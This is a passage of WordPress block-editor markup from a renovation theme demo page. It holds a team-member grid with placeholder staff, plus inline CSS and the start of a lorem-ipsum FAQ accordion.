leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ec6e65f8-ff22-4968-af3a-cce4cc21b8a3\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f25b9c21-2e8e-4873-9145-526e0c982809\"} -->\n<style type=\"text/css\"> .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f25b9c21-2e8e-4873-9145-526e0c982809 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f25b9c21-2e8e-4873-9145-526e0c982809 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"rightPadding\":80,\"rightPaddingTablet\":30,\"rightPaddingMobile\":0,\"blockId\":\"68b54430-940b-4d40-99b2-a93a58a6a678\"} -->\n<style type=\"text/css\"> .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 80px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-68b54430-940b-4d40-99b2-a93a58a6a678 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-68b54430-940b-4d40-99b2-a93a58a6a678\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"627304db-e6fd-4a57-93f7-a54b4780da61\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"subheadSpacingTablet\":35,\"subheadSpacingMobile\":25,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 35px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n margin-bottom: 25px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-627304db-e6fd-4a57-93f7-a54b4780da61 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-627304db-e6fd-4a57-93f7-a54b4780da61\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">FAQs</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Get every answer<br>from here</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/accordion {\"block_id\":\"34ee5663\",\"schema\":\"{\\u0022@context\\u0022:\\u0022https://schema.org\\u0022,\\u0022@type\\u0022:\\u0022AccordionPage\\u0022,\\u0022mainEntity\\u0022:[{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Real Estate Law\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022The industry standard\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Unknown printer galley\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}},{\\u0022@type\\u0022:\\u0022Title\\u0022,\\u0022name\\u0022:\\u0022Aldus PageMaker including\\u0022,\\u0022acceptedContent\\u0022:{\\u0022@type\\u0022:\\u0022Content\\u0022,\\u0022text\\u0022:\\u0022Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\\u0022}}]}\"} -->\n<div class=\"wp-block-skt-blocks-accordion skt-blocks-accordion__outer-wrap skt-blocks-block-34ee5663 skt-blocks-accordion-icon-row skt-blocks-accordion-layout-accordion skt-blocks-accordion-expand-first-false skt-blocks-accordion-inactive-other-true skt-blocks-accordion-equal-height\"><style type=\"text/css\">.skt-blocks-block-34ee5663 {\nmargin-top: undefinedpx;margin-bottom: undefinedpx;margin-left: undefinedpx;margin-right: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;margin-right: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;fill: #656565;margin-right: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg:hover{\nfill: undefined!important;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item__outer-wrap{\nmargin-bottom: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion__wrap.skt-blocks-buttons-layout-wrap{\ngrid-column-gap: 10px;grid-row-gap: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item:hover .skt-blocks-icon svg{\nfill: #656565;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles{\nflex-direction: row;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button .skt-blocks-title{\nfont-size: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item .skt-blocks-accordion-content{\nbackground-image: linear-gradient(100deg,rgba(238, 238, 238, 100),rgba(238, 238, 238, 1));font-size: undefinedpx;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-item__outer-wrap .skt-blocks-accordion-content {\ndisplay: none;}\n@media only screen and (max-width: 1024px) {\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content span{\nmargin-top: 10px;margin-bottom: 10px;margin-right: 10px;margin-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n.skt-blocks-block-34ee5663 .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n@media only screen and (max-width: 768px) {\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-titles-button{\npadding-top: 10px;padding-bottom: 10px;padding-right: 10px;padding-left: 10px;}\n.skt-blocks-block-34ee5663 .skt-blocks-accordion-content 